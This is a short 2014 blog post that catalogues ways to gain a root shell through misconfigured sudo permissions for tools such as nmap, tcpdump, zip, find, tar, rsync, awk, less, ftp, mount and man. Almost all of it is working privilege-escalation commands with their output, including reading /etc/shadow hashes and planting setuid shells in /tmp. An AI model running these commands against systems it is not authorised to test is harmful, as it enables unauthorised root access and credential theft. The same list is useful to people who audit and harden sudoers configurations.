Monday, May 19, 2014

Abusing sudo to get root

In some insecure Linux configurations, it is more or less easy to abuse sudo to get a root shell.

You can find out which commands your user is allowed to run as root by calling "sudo -l".

Here are some examples:

1. SUDO NMAP

user@host:~$ sudo nmap -iL /etc/shadow 2>&1 | grep root
Failed to resolve "root:$6$tacLae7v$blr1A8KS2WwHTLgttagiFMgGa94JEkKXVNXAm8a5Lg5vJrdowQTiycwML9M2ibBF6Vu4KZAHcOgOLuqrc6kdn0:16135:0:99999:7:::".
(nmap < 5.35DC1 also has a “—interactive” switch which drops you to a shell where you can execute commands by using the “!cmd” syntax)

2. SUDO FILE

user@host:~$ sudo file -m /etc/shadow
/etc/shadow, 1: Warning: offset `root:$6$5EZeAFXG$V.b3POklvJLNMt0cIEIQecW2Co6cKFUXmDR5bHVjWdsgTJq8URt6m7zBfNFNxdMEZHD7F4esGON.OED88HBPn1:16491:0:99999:7:::' invalid
[... snip ...]

3. SUDO TCPDUMP

user@host:~$ echo -e "cp /bin/sh /tmp/sh_suid\nchmod 7555 /tmp/sh_suid" > tmpfile
user@host:~$ chmod +x tmpfile
user@host:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
Maximum file limit reached: 1
user@host:~$ ls -l /tmp/sh_suid 
-r-sr-sr-t 1 root root 117176 May 19 10:14 /tmp/sh_suid
user@host:~$ /tmp/sh_suid
# whoami
root

4. SUDO ZIP

user@host:~$ touch somefile
user@host:~$ sudo zip -q /tmp/test.zip somefile -T -TT '/bin/sh #'
# id
uid=0(root) gid=0(root) groups=0(root)

5. SUDO FIND

user@host:~$ sudo find /dev/null -exec sh \;
# id
uid=0(root) gid=0(root) groups=0(root)

6. SUDO TAR

user@host:~$ touch somefile
user@host:~$ sudo tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

7. SUDO RSYNC


user@host:/tmp$ cat > somefile << EOF
> cp /bin/sh /tmp/sh_root
> chmod a+sx /tmp/sh_root
> EOF
user@host:/tmp$ sudo rsync  -e 'sh /tmp/somefile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
user@host:/tmp$ /tmp/sh_root
# whoami
root

8. SUDO AWK

user@host:~$ sudo awk 'BEGIN {system("/usr/bin/id")}'
uid=0(root) gid=0(root) groups=0(root)
9. SUDO MORE/SUDO LESS
user@host:~$ sudo more /dev/zero 
[...]
!bash
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
10. SUDO (S)FTP
user@host:~$ sudo ftp
ftp> !id
uid=0(root) gid=0(root) groups=0(root)
ftp> 

11. SUDO MOUNT
user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

8. SUDO MAN
user@host:~$ sudo man -P id man
uid=0(root) gid=0(root) groups=0(root)

No comments:

Post a Comment